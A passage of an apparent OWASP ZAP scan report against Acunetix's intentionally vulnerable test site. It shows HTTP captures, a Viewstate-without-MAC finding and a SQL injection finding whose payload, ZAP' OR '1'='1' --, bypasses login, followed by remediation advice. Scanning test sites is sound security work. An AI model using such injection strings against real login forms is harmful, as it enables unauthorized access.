href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          tbUsername
          Attack
          ZAP' OR '1'='1' -- 
          Solution

          Do not trust client side input, even if there is client side validation in place.

          In general, type check all data on the server side.

          If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

          If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

          If database Stored Procedures can be used, use them.

          Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

          Do not create dynamic SQL queries using simple string concatenation.

          Escape all data received from the client.

          Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

          Apply the principle of least privilege by using the least privileged database user possible.

          In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

          Grant the minimum database access that is necessary for the application.

  2. Risk=高等的, Confidence= (15)

    1. http://testaspnet.vulnweb.com (15)

      1. Viewstate without MAC Signature (Unsure) (15)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a 